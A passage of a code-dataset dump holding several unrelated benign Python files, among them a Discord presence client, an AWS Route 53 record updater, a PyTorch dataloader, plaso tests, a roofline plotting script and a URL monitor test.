-1\n rank = \"bronze\"\n\n strings = buildstrings(mode,mapinfo,sr,rank)\n # state, details, largeimg, largecpt, smallimg, smallcpt\n try:\n rpc.update(state=strings[0],details=strings[1],large_image=strings[2],large_text=strings[3],small_image=strings[4],small_text=strings[5],start=int(time.time()))\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n globals.ingame = 1\n globals.map = mapinfo[0]\n globals.mode = maps.modes[mode][0]\n except Exception as e:\n print(col.fail + \"Couldn't set your presence.\")\n print(col.fail + \"pypresence says: \" + str(e))\n else:\n strings = buildstrings(mode,mapinfo,0,\"\")\n try:\n rpc.update(state=strings[0],details=strings[1],large_image=strings[2],large_text=strings[3],start=int(time.time()))\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n globals.ingame = 1\n except Exception as e:\n print(col.fail + \"Couldn't set your presence.\")\n print(col.fail + \"pypresence says: \" + str(e))\n\nprint(col.smile + \"Overwatch RPC Client Version \" + conf.version)\nprint(col.info + \"Created by github.com/maxicc\")\nprint(col.info + \"View all available commands using !help.\")\nif dt.now().hour == 12:\n print(col.blank + \"It's high noon.\")\nelse:\n print(col.blank + owquotes[randint(0,len(owquotes) - 1)]) # randint is inclusive at both ends\n\nwhile True:\n command = input(col.cmd)\n if command.endswith(\"!help\"):\n info()\n elif command.endswith(\"!set\") or command.endswith(\"!newgame\"):\n newgame()\n elif command.endswith(\"!fullclear\"):\n fullclear()\n elif command.endswith(\"!clear\") or command.endswith(\"!menus\"):\n clear()\n elif command.endswith(\"!win\") or command.endswith(\"!won\") or command.endswith(\"!victory\"):\n endgame(\"w\")\n elif command.endswith(\"!lost\") or command.endswith(\"!loss\") or command.endswith(\"!lose\") or command.endswith(\"!defeat\"):\n endgame(\"l\")\n elif command.endswith(\"!draw\") or command.endswith(\"!drew\"):\n endgame(\"d\")\n elif command.endswith(\"!quit\"):\n print(col.success + \"Quitting...\")\n sys.exit(0)\n elif command.endswith(\"!iwanttospeaktothemanager\") or command.endswith(\"!github\"):\n print(col.smile + \"Please fill out this complaints form: https://github.com/maxicc/overwatch-rpc/issues\")\n else:\n print(col.fail + \"Couldn't find that command! 
Try running !help to view a list of all commands.\")\n","sub_path":"owrpcMain.py","file_name":"owrpcMain.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"511986564","text":"import pandas as pd\ntotal_data = pd.read_csv('cleansing_data.csv')\nprint(len(total_data))\n\n\nimport re\nfrom pykospacing import spacing \n# from hanspell import spell_checker\n# from soynlp.normalizer import repeat_normalize\ndef spacing_text(reviews):\n corpus = []\n for review in reviews:\n # review = re.sub(r'\\s', '', str(review)) #remove spaces\n review = spacing(str(review))\n # review = spell_checker.check(str(review))\n # review = review.checked\n # review = repeat_normalize(str(review))\n corpus.append(review)\n return corpus\n\n\ntotal_data['review'] = spacing_text(total_data['review'])\nprint(len(total_data))\ntotal_data.to_csv('spacing_data2.csv', index=False)","sub_path":"pjt2/MechineLearning/etc/etc/tpu/spacing_text.py","file_name":"spacing_text.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415955726","text":"from threading import Timer\n\nclass MyTimer:\n\n def __init__(self):\n self._timer= None\n self._tm = None\n self._fn = None\n\n def _do_func(self):\n if self._fn:\n self._fn()\n self._do_start()\n\n def _do_start(self):\n self._timer = Timer(self._tm, self._do_func)\n self._timer.start()\n\n def start(self, tm, fn):\n self._tm = tm\n self._fn = fn\n self._do_start()\n\n def stop(self):\n try:\n self._timer.cancel()\n except:\n pass\n\ndef hello():\n from datetime import datetime\n print(\"hello world!\", datetime.now())\n\n\nif __name__ == '__main__':\n\n mt = MyTimer()\n mt.start(2, hello)\n for i in range(10):\n import time\n time.sleep(1)\n mt.stop()\n\n","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"447507707","text":"from edge import Edge\n\n\nclass Vertex:\n\n def __init__(\n self,\n id,\n coordinates,\n directed=False,\n directed_index=None\n ):\n \"\"\"Creates a vertex.\n\n Arguments:\n id -- str corresponding to vertex id\n coordinates -- tuple of vertex coordinates\n edge_list -- iterable of incident vertex objects\n \"\"\"\n self.id = id\n self.coordinates = coordinates\n self.edges = [None, None, None, None, None]\n self.add_edge_to(self, 4)\n self.heuristic = 0\n self.directed = directed\n self.directed_index = directed_index\n self.directed_previous = None\n\n def add_edge(self, edge):\n self.edges.append(edge)\n\n def add_edge_to(self, vertex, index):\n \"\"\"Adds edge to the current vertex. 
The origin of the edge is\n automatically set to self, and only the destination vertex need be\n supplied.\n\n Arguments:\n vertex -- destination vertex in edge\n \"\"\"\n self.edges[index] = Edge(self, vertex)\n\n def edge_index_to_vertex(self, vertex):\n \"\"\"Return index of the edge at which vertex is the destination, or None\n if vertex is not in the edge list.\n\n\n Arguments:\n vertex -- vertex object.\n \"\"\"\n try:\n if self.directed and vertex == self.directed_previous:\n return self.directed_index\n for i in range(len(self.edges)):\n e = self.edges[i]\n if e is None:\n continue\n elif e.destination == vertex:\n return i\n return None\n except Exception:\n return None\n\n def get_opposite_edge(self, edge):\n opposite_vertex = edge.destination\n for e in opposite_vertex.edges:\n if e is not None and e.destination == edge.origin:\n return e\n\n return None\n\n def __str__(self):\n return (\n 'Vertex id: {}\\n\\n'\n 'Incident edges: {}'\n .format(self.id, ', '.join([\n str(e) for e in self.edges\n ]))\n )\n\n def __eq__(self, other):\n if isinstance(other, Vertex):\n return self.id == other.id\n\n if isinstance(other, PriorityQueueVertex):\n return self.id == other.vertex.id\n\n if isinstance(other, str):\n return self.id == other\n\n # handle edge case, if vertex is being compared with something else\n return NotImplemented\n\n def __ne__(self, other):\n retval = self.__eq__(other)\n if retval is NotImplemented:\n return retval\n\n return not retval\n\n def __hash__(self):\n return self.id.__hash__()\n\n\nclass PriorityQueueVertex():\n\n def __init__(self, vertex, cost, previous_vertex):\n \"\"\"Stores relevant information of vertices during path computation.\n\n Arguments:\n cost -- integer. Cumulative edge costs leading up to\n vertex.\n previous_vertex -- Vertex object. 
Leaves a path running back to the\n starting vertex.\n \"\"\"\n self.vertex = vertex\n self.cost = cost\n self.previous_vertex = previous_vertex\n if self.previous_vertex is not None:\n self.depth = self.previous_vertex.depth + 1\n else:\n self.depth = 0\n\n def __eq__(self, other):\n if isinstance(other, Vertex):\n return self.vertex.id == other.id\n\n if isinstance(other, PriorityQueueVertex):\n return self.vertex.id == other.vertex.id\n\n # handle edge case, if vertex is being compared with something else\n return NotImplemented\n\n def __ne__(self, other):\n retval = self.__eq__(other)\n if retval is NotImplemented:\n return retval\n\n return not retval\n\n def __lt__(self, v):\n return self.cost < v.cost\n\n def __str__(self):\n return self.vertex.id\n","sub_path":"graph/vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"644109196","text":"import torch\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom dataProcess import *\n\n\n\nclass MyDataLoader(Dataset):\n def __init__(self,df):\n self.df = df\n self.len_idx = 0\n self.id_list = []\n self.timestep_list = []\n\n #결측치 있는 행 모두 제거\n self.df = self.df.dropna(axis=0)\n\n self.id_list = self.df.index\n self.timestep_list = list(self.df.iloc[0:,-1].values)\n\n def __len__(self):\n return(len(self.df.index))\n\n def __getitem__(self,index):\n x = torch.tensor(self.df.iloc[index,0*48:7*48]).view(-1,48*7)\n y = torch.tensor(self.df.iloc[index,7*48:8*48]).view(-1,48)\n factor = getFactorTensor(self.id_list[index].tolist(),self.timestep_list[index].tolist())\n factor = factor.view(-1,125)\n\n return x, y, factor\n\n\nif __name__=='__main__':\n df_test = pd.read_csv(\"/daintlab/data/sr/testdf.csv\",index_col=0)\n \n test_dataset = MyDataLoader(df_test)\n test_loader = DataLoader(test_dataset, shuffle=False, batch_size=64, pin_memory=False)\n\n x, y, factor = next(iter(test_loader))\n\n print(\"x :\",x.shape)\n print(\"y :\",y.shape)\n print(\"factor :\",factor.shape)\n '''\n #================================================================================#\n\n df_train = pd.read_csv(\"/daintlab/data/sr/traindf.csv\",index_col=0)\n\n train_dataset = MyDataLoader(df_train)\n train_loader = DataLoader(train_dataset, shuffle=False, batch_size=64, pin_memory=False)\n\n x, y, factor = next(iter(train_loader))\n\n print(\"x :\",x.shape)\n print(\"y :\",y.shape)\n print(\"factor :\",factor.shape)\n '''","sub_path":"LSTM/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"33545921","text":"#!/usr/bin/env python\n\nimport json\n\nfrom py.core.utils import read_template, find_directory\nfrom py.core.logging import log_debug, log_info\n\n\ndef __update_route_53_records(dns_info, session):\n route53_client = session.current.client('route53')\n\n domain = dns_info['domain']\n subdomain = dns_info['subdomain']\n endpoint = dns_info['endpoint']\n\n if dns_info['update_public_zones'] == 'public':\n update_public_zones = True\n else:\n update_public_zones = False\n\n log_info(\"Searching for route 53 hosted zones by dns name '{}'\".format(domain))\n\n response = route53_client.list_hosted_zones_by_name(\n DNSName=domain\n )\n\n for hosted_zone in 
response['HostedZones']:\n\n hosted_zone_id = hosted_zone['Id']\n hosted_zone_name = hosted_zone['Name']\n\n # always update everything if updating public dns\n # otherwise update only private dns\n if update_public_zones is True or hosted_zone['Config']['PrivateZone'] is True:\n\n log_info(\"Searching hosted zone with id '{} and name {}'\".format(hosted_zone_id, hosted_zone_name))\n\n # skip updating zones we don't want\n if hosted_zone_name == domain:\n\n # create the final domain name to be updated\n domain_name = \"{}.{}\".format(subdomain, domain)\n\n (hosted_zone_id, found_record_set_name, found_record_set_value) = __check_dns_record_sets(\n client=route53_client,\n hosted_zone_id=hosted_zone_id,\n record_set_name=domain_name,\n endpoint=endpoint\n )\n\n if not found_record_set_name or not found_record_set_value:\n __update_dns_record_sets(\n client=route53_client,\n hosted_zone_id=hosted_zone_id,\n rs_update={\n \"domain_name\": domain_name,\n \"endpoint\": endpoint\n }\n )\n\n\ndef __update_dns_record_sets(client, hosted_zone_id, rs_update):\n endpoint = rs_update['endpoint']\n domain_name = rs_update['domain_name']\n\n change_batch = read_template(\"{}/templates/r53.changebatch.json\".format(find_directory(__file__)))\n\n changes = change_batch['Changes']\n change = changes[0]\n\n resource_rs = change['ResourceRecordSet']\n\n resource_rs['Name'] = str(resource_rs['Name']).format(domain_name=domain_name)\n resource_records = resource_rs['ResourceRecords']\n resource_rec = resource_records[0]\n resource_rec['Value'] = str(resource_rec['Value']).format(end_domain=endpoint)\n\n log_debug(\"{} request = {}\".format(\"change_batch\", json.dumps(change_batch, indent=4, sort_keys=True, default=str)))\n\n response = client.change_resource_record_sets(\n HostedZoneId=hosted_zone_id,\n ChangeBatch=change_batch\n )\n # REVIEW: Could add a waiter to hold until change is done but it happens very quickly even though\n # DNS takes a while to propegate\n log_debug(\"{} response = {}\".format(\"change_resource_record_sets\",\n json.dumps(response, indent=4, sort_keys=True, default=str)))\n\n\ndef __check_dns_record_sets(client, hosted_zone_id, record_set_name, endpoint):\n log_info(\"Searching hosted zone domain registry for references to our domain name.\")\n\n record_set_type = 'CNAME'\n\n response = client.list_resource_record_sets(\n HostedZoneId=hosted_zone_id,\n StartRecordName=record_set_name,\n StartRecordType=record_set_type,\n MaxItems='1'\n )\n\n found_record_set_name = False\n found_record_set_value = False\n\n for record_set in response['ResourceRecordSets']:\n # Find the record set type we are after\n if record_set_type == record_set['Type'] and record_set_name == record_set['Name']:\n log_info(\"Found an existing '{}' record set for domain name '{}'.\".format(record_set_type, record_set_name))\n found_record_set_name = True\n # There could be a few\n for resource_records in record_set['ResourceRecords']:\n record_value = resource_records['Value']\n log_info(\"Which has a resource record value '{}'\".format(record_value))\n # Check each one against our required url for a match\n if endpoint == record_value:\n log_info(\"Which matches our endpoint.\".format(endpoint))\n found_record_set_value = True\n\n if not found_record_set_name:\n log_info(\"Didn't find any record sets for {} which means we'll need to create one and point it to '{}'\"\n .format(record_set_name, endpoint))\n else:\n if not found_record_set_value:\n log_info(\"But it doesn't match our endpoint '{}' so it will be 
updated.\".format(endpoint))\n else:\n log_info(\"So no work to do.\")\n\n return hosted_zone_id, found_record_set_name, found_record_set_value\n\n\ndef update_record_sets(dns_info, session):\n __update_route_53_records(dns_info=dns_info, session=session)\n","sub_path":"aws/aws-py/py/r53/record_sets.py","file_name":"record_sets.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"199146507","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the extraction tool object.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport argparse\nimport unittest\n\nfrom plaso.cli import extraction_tool\n\nfrom tests.cli import test_lib\n\n\nclass ExtractionToolTest(test_lib.CLIToolTestCase):\n \"\"\"Tests for the extraction tool object.\"\"\"\n\n # pylint: disable=protected-access\n\n _EXPECTED_PERFORMANCE_OPTIONS = '\\n'.join([\n 'usage: extraction_tool_test.py [--buffer_size BUFFER_SIZE]',\n ' [--queue_size QUEUE_SIZE]',\n '',\n 'Test argument parser.',\n '',\n 'optional arguments:',\n (' --buffer_size BUFFER_SIZE, --buffer-size BUFFER_SIZE, '\n '--bs BUFFER_SIZE'),\n (' The buffer size for the output (defaults to '\n '196MiB).'),\n ' --queue_size QUEUE_SIZE, --queue-size QUEUE_SIZE',\n ' The maximum number of queued items per worker',\n ' (defaults to 125000)',\n ''])\n\n # TODO: add test for _CreateProcessingConfiguration\n\n def testParsePerformanceOptions(self):\n \"\"\"Tests the _ParsePerformanceOptions function.\"\"\"\n test_tool = extraction_tool.ExtractionTool()\n\n options = test_lib.TestOptions()\n\n test_tool._ParsePerformanceOptions(options)\n\n # TODO: add test for _ParseProcessingOptions\n # TODO: add test for _PreprocessSources\n # TODO: add test for _ReadParserPresetsFromFile\n # TODO: add test for _SetExtractionParsersAndPlugins\n # TODO: add test for _SetExtractionPreferredTimeZone\n\n def testAddPerformanceOptions(self):\n \"\"\"Tests the AddPerformanceOptions function.\"\"\"\n argument_parser = argparse.ArgumentParser(\n prog='extraction_tool_test.py', description='Test argument parser.',\n add_help=False, formatter_class=test_lib.SortedArgumentsHelpFormatter)\n\n test_tool = extraction_tool.ExtractionTool()\n test_tool.AddPerformanceOptions(argument_parser)\n\n output = self._RunArgparseFormatHelp(argument_parser)\n self.assertEqual(output, self._EXPECTED_PERFORMANCE_OPTIONS)\n\n # TODO: add test for AddProcessingOptions\n\n def testListParsersAndPlugins(self):\n \"\"\"Tests the ListParsersAndPlugins function.\"\"\"\n presets_file = self._GetTestFilePath(['presets.yaml'])\n self._SkipIfPathNotExists(presets_file)\n\n output_writer = test_lib.TestOutputWriter(encoding='utf-8')\n test_tool = extraction_tool.ExtractionTool(output_writer=output_writer)\n test_tool._presets_manager.ReadFromFile(presets_file)\n\n test_tool.ListParsersAndPlugins()\n\n output = output_writer.ReadOutput()\n\n number_of_tables = 0\n lines = []\n for line in output.split('\\n'):\n line = line.strip()\n lines.append(line)\n\n if line.startswith('*****') and line.endswith('*****'):\n number_of_tables += 1\n\n self.assertIn('Parsers', lines[1])\n\n lines = frozenset(lines)\n\n self.assertEqual(number_of_tables, 10)\n\n expected_line = 'filestat : Parser for file system stat information.'\n self.assertIn(expected_line, lines)\n\n expected_line = 'bencode_utorrent : Parser for uTorrent bencoded files.'\n self.assertIn(expected_line, lines)\n\n expected_line = (\n 'msie_webcache : Parser for 
MSIE WebCache ESE database files.')\n self.assertIn(expected_line, lines)\n\n expected_line = 'olecf_default : Parser for a generic OLECF item.'\n self.assertIn(expected_line, lines)\n\n expected_line = 'plist_default : Parser for plist files.'\n self.assertIn(expected_line, lines)\n\n # Note that the expected line is truncated by the cell wrapping in\n # the table.\n expected_line = (\n 'chrome_27_history : Parser for Google Chrome 27 and up history SQLite')\n self.assertIn(expected_line, lines)\n\n expected_line = 'ssh : Parser for SSH syslog entries.'\n self.assertIn(expected_line, lines)\n\n expected_line = 'winreg_default : Parser for Registry data.'\n self.assertIn(expected_line, lines)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/cli/extraction_tool.py","file_name":"extraction_tool.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"106536580","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\nfrom client.models import Client\nfrom client.forms import FormRechercheClient\n\nfrom Antares.Verrou import Verrou\n\n\ndef ajoutClient(formAjoutClient):\n\n b_sauver = False\n dj = date.today()\n\n if formAjoutClient.is_valid():\n client = formAjoutClient.save(commit=False)\n #code\n debut_code = dj.strftime(\"%Y\") + dj.strftime(\"%m\") + dj.strftime(\"%d\")\n compteur = Client.objects.filter(code__startswith=debut_code).count()\n if compteur < 10:\n s_compteur = '00' + str(compteur + 1)\n elif compteur < 100:\n s_compteur = '0' + str(compteur + 1)\n\n code = debut_code + s_compteur\n client.code = code\n client.save()\n b_sauver = True\n\n return {\"form\": formAjoutClient, \"b_sauver\": b_sauver}\n\n\ndef sauvClient(client):\n verrou = Verrou('codeClient.lock')\n while verrou.ferme() == 0:\n pass\n\n dj = date.today()\n debut_code = dj.strftime(\"%Y\") + dj.strftime(\"%m\") + dj.strftime(\"%d\")\n compteur = Client.objects.filter(code__startswith=debut_code).count()\n if compteur < 10:\n s_compteur = '00' + str(compteur + 1)\n elif compteur < 100:\n s_compteur = '0' + str(compteur + 1)\n\n code = debut_code + s_compteur\n client.code = code\n client.save()\n\n verrou.ouvre()\n\n return client\n\n\ndef ajoutPrescripteur(formAjoutPrescripteur):\n\n b_sauver = False\n\n if formAjoutPrescripteur.is_valid():\n formAjoutPrescripteur.save()\n b_sauver = True\n\n return {\"form\": formAjoutPrescripteur, \"b_sauver\": b_sauver}\n\n\ndef ajoutOrganisme(formAjoutOrganisme):\n\n b_sauver = False\n\n if formAjoutOrganisme.is_valid():\n formAjoutOrganisme.save()\n b_sauver = True\n\n return {\"form\": formAjoutOrganisme, \"b_sauver\": b_sauver}\n\n\ndef initFiltration(request):\n b_listeFiltree = False\n posted = None\n if \"appClient\" in request.session:\n if \"filtrage\" in request.session[\"appClient\"]:\n b_listeFiltree = True\n posted = request.session['appClient']['formRechercheClient']\n else:\n request.session[\"appClient\"] = {}\n else:\n request.session[\"appClient\"] = {}\n\n request.session.modified = True\n return {'posted': posted, 'b_listeFiltree': b_listeFiltree}\n\n\ndef filtration(request):\n #reset\n if \"filtrage\" in request.session['appClient']:\n formRechercheClient = FormRechercheClient()\n del request.session['appClient']['filtrage']\n del request.session['appClient']['formRechercheClient']\n b_listeFiltree = False\n\n filtrage = Client.objects.all()\n form = FormRechercheClient(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n\n 
if cd.get(\"code\"):\n filtrage = filtrage.filter(code__contains=cd.get(\"code\"))\n b_listeFiltree = True\n\n if cd.get(\"nom\"):\n filtrage = filtrage.filter(nom__contains=cd.get(\"nom\"))\n b_listeFiltree = True\n\n if cd.get(\"prenom\"):\n filtrage = filtrage.filter(prenom__contains=cd.get(\"prenom\"))\n b_listeFiltree = True\n\n if cd.get(\"telephone\"):\n filtrage = filtrage.filter(telephone__contains=cd.get(\"telephone\"))\n b_listeFiltree = True\n\n if cd.get(\"email\"):\n filtrage = filtrage.filter(email__contains=cd.get(\"email\"))\n b_listeFiltree = True\n\n if cd.get(\"organisme\"):\n filtrage = filtrage.filter(organisme=cd.get(\"organisme\"))\n b_listeFiltree = True\n\n if b_listeFiltree == True:\n formRechercheClient = FormRechercheClient(request.POST)\n request.session[\"appClient\"][\"filtrage\"] = filtrage\n request.session['appClient']['formRechercheClient'] = request.POST\n\n else:\n if \"filtrage\" in request.session['appClient']:\n del request.session['appClient']['filtrage']\n del request.session['appClient']['formRechercheClient']\n\n request.session.modified = True\n return {'filtrage': filtrage, 'b_listeFiltree': b_listeFiltree}\n","sub_path":"Antares/client/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"346838844","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport random\n\n# https://www.kaggle.com/paultimothymooney/chest-xray-pneumonia#chest_xray.zip\n\ntotal_images_train_normal = os.listdir('data/train/NORMAL/')\ntotal_images_train_pneumonia = os.listdir('data/train/PNEUMONIA/')\n\nsample_normal = random.sample(total_images_train_normal,6)\nf,ax = plt.subplots(2,3,figsize=(15,9))\n\n## ---------------- View example Healthy X-rays ----------------\nfor i in range(0,6):\n im = plt.imread('data/train/NORMAL/'+sample_normal[i])\n ax[i//3,i%3].imshow(im)\n ax[i//3,i%3].axis('off')\nf.suptitle('Normal Lungs')\nplt.show()\n\n\n## --------------- View example Pneumonia X-rays ---------------\nsample_pneumonia = random.sample(total_images_train_pneumonia,6)\nf,ax = plt.subplots(2,3,figsize=(15,9))\n\nfor i in range(0,6):\n im = plt.imread('data/train/PNEUMONIA/'+sample_pneumonia[i])\n ax[i//3,i%3].imshow(im)\n ax[i//3,i%3].axis('off')\nf.suptitle('Pneumonia Lungs')\nplt.show()\n\n\n## --------------- View dataset split ---------------\nplt.bar(x=['Normal','Pneumonia'],\n height=[len(total_images_train_normal),\n len(total_images_train_pneumonia)],\n color=['lightblue','lightcoral']) # 'lightred' is not a valid matplotlib color name\nplt.title('Image volume in train set')\nplt.show()\n\n# data/ folder directory structure:\n# train/\n# NORMAL - 1341 images\n# PNEUMONIA - 3875 images\n# val/\n# NORMAL - 8 images\n# PNEUMONIA - 8 images\n# test/\n# NORMAL - 234 images\n# PNEUMONIA - 390 images\n\n\n","sub_path":"kaggle_pneumonia/dataset_overview.py","file_name":"dataset_overview.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"175763724","text":"# -*- coding:utf-8 -*-\n\nfrom torch import device\nfrom torch.cuda import is_available\n\n\nclass Option:\n \"\"\"\n All options for this program, including hyperparameters and other runtime settings.\n \"\"\"\n def __init__(self):\n # hyperparameters\n # initial learning rate\n self.lr = 0.005\n self.momentum = 0.9\n # learning rate decay\n self.lr_decay = 0.1\n self.lr_decay_threshold = 1e-5\n # weight 
decay\n self.reg = 1e-2\n\n # runtime settings\n # the root of dataset\n self.cifar10_path = '../data/'\n self.num_train = 45000\n self.num_total = 50000\n # statistics of cifar-10\n self.mean = (0.4914, 0.4822, 0.4465)\n self.std = (0.2023, 0.1994, 0.2010)\n\n # which model to use\n self.model = 'ResNet18'\n\n self.epochs = 20\n self.batch_size = 64\n\n self.print_freq = 200\n # number of processes used to load data\n self.workers = 4\n\n self.use_gpu = True\n self._upgrade_device()\n\n # visualization option\n self.visual = True\n\n def __setattr__(self, key, value):\n self.__dict__[key] = value\n if key == 'use_gpu':\n self._upgrade_device()\n\n def _upgrade_device(self):\n self.device = device('cuda:0' if self.use_gpu and is_available() else 'cpu')\n if self.device.type == 'cuda':\n self.pin_memory = True\n else:\n self.pin_memory = False\n\n\nopt = Option()\n","sub_path":"basic/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"423803409","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef label_line(line, label, x, y, color='0.5', size=12):\n \"\"\"Add a label to a line, at the proper angle.\n\n Arguments\n ---------\n line : matplotlib.lines.Line2D object,\n label : str\n x : float\n x-position to place center of text (in data coordinated\n y : float\n y-position to place center of text (in data coordinates)\n color : str\n size : float\n \"\"\"\n xdata, ydata = line.get_data()\n x1 = xdata[0]\n x2 = xdata[-1]\n y1 = ydata[0]\n y2 = ydata[-1]\n\n ax = line.axes\n text = ax.annotate(label, xy=(x, y), xytext=(-10, 0),\n textcoords='offset points',\n size=size, color=color,\n horizontalalignment='left',\n verticalalignment='bottom')\n\n sp1 = ax.transData.transform_point((x1, y1))\n sp2 = ax.transData.transform_point((x2, y2))\n\n rise = (sp2[1] - sp1[1])\n run = (sp2[0] - sp1[0])\n\n slope_degrees = np.degrees(np.arctan2(rise, run))\n text.set_rotation(slope_degrees)\n return text\n\ndef main():\n plt.xlabel('Arithmetic intensity (FLOP/byte)',fontsize=20)\n plt.ylabel('Performance (GFLOPS)',fontsize=20)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n plt.loglog()\n\n xmin = 1.0e-2\n xmax = 1000\n ymin = 1.0e-2\n ymax = 1.0e3\n\n # ridge\n # 2nd x point is where label is placed\n x_bw = [xmin, 1.0e-3, 10]\n\n # Flat mode\n \n # DRAM\n BW = 15.2\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='r', linestyle='-', label='_DRAM: 15.7 GB/s')\n\n # L3\n BW = 27.8\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='y', linestyle='-', label='_L3: 26.5 GB/s')\n\n # L2\n BW = 228.7\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='g', linestyle='-', label='_L2: 226.1 GB/s')\n\n # L1\n BW = 362.0\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='b', linestyle='-', label='_L1: 362.2 GB/s')\n\n # roof\n x_compute = [1.0e-2,15,xmax]\n\n # Scalar add peak\n y_compute = [7.4, 7.4, 7.4]\n plt.plot(x_compute, y_compute, color='r', linestyle='-',\n label='_Scalar add: 7.4 GF/s')\n\n # DP Vector add peak\n y_compute = [52.6, 52.6, 52.6]\n plt.plot(x_compute, y_compute, color='y', linestyle='-',\n label='_DP vector add: 52.6 GF/s')\n\n # DP Vector FMA peak\n y_compute = [105.2, 105.2, 105.2]\n plt.plot(x_compute, y_compute, color='g', linestyle='-',\n label='_DP vector FMA: 105.2 GF/s')#, SP vector add')\n\n# # 
SP Vector add peak\n# y_compute = [105.2, 105.2, 105.2]\n# plt.plot(x_compute, y_compute, color='c', linestyle='-',\n# label='SP vector add')\n\n # SP Vector FMA peak\n y_compute = [210.3, 210.3, 210.3]\n plt.plot(x_compute, y_compute, color='b', linestyle='-',\n label='_SP vector FMA: 210.3 GF/s')\n\n # plot the labels\n lines = plt.gca().get_lines()\n for line in lines:\n label_line(line, line.get_label(),\n line.get_xdata()[1], line.get_ydata()[1])\n\n # SpMV\n AI = 0.10\n GFS = 1.55\n plt.plot(AI,GFS,'o',ms=10,color='r',label='SpMV')\n plt.plot([AI,AI], [ymin,ymax], color='k', linestyle='--', lw=0.2)\n plt.plot([xmin,xmax], [GFS,GFS], color='k', linestyle='--', lw=0.2)\n\n # SYMGS Forward\n AI = 0.1\n GFS = 2.1\n plt.plot(AI,GFS,'o',ms=10,color='g',label='GS Forward')\n plt.plot([AI,AI], [ymin,ymax], color='k', linestyle='--', lw=0.2)\n plt.plot([xmin,xmax], [GFS,GFS], color='k', linestyle='--', lw=0.2)\n\n # SYMGS Backward\n AI = 0.1\n GFS = 1.752\n plt.plot(AI,GFS,'o',ms=10,color='b',label='GS Backward')\n plt.plot([AI,AI], [ymin,ymax], color='k', linestyle='--', lw=0.2)\n plt.plot([xmin,xmax], [GFS,GFS], color='k', linestyle='--', lw=0.2)\n\n plt.legend(loc='lower right')\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"roof.py","file_name":"roof.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"370363852","text":"# Copyright 2014-2020 Scalyr Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------\n#\n# author: Edward Chee \n\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\n\n\nfrom scalyr_agent.builtin_monitors.url_monitor import UrlMonitor\nfrom scalyr_agent.test_base import ScalyrTestCase\n\nimport mock\n\n\nclass UrLMonitorTest(ScalyrTestCase):\n def test_gather_sample(self):\n monitor_config = {\n \"module\": \"shell_monitor\",\n \"url\": \"https://www.scalyr.com\",\n \"request_method\": \"GET\",\n \"max_characters\": 100,\n }\n mock_logger = mock.Mock()\n monitor = UrlMonitor(monitor_config, mock_logger)\n\n monitor.gather_sample()\n call_args_list = mock_logger.emit_value.call_args_list[0]\n call_args = call_args_list[0]\n call_kwargs = call_args_list[1]\n\n self.assertEqual(call_args[0], \"response\")\n self.assertTrue(len(call_args[1]) >= 10)\n self.assertEqual(call_kwargs[\"extra_fields\"][\"url\"], \"https://www.scalyr.com\")\n self.assertEqual(call_kwargs[\"extra_fields\"][\"status\"], 200)\n self.assertEqual(call_kwargs[\"extra_fields\"][\"request_method\"], 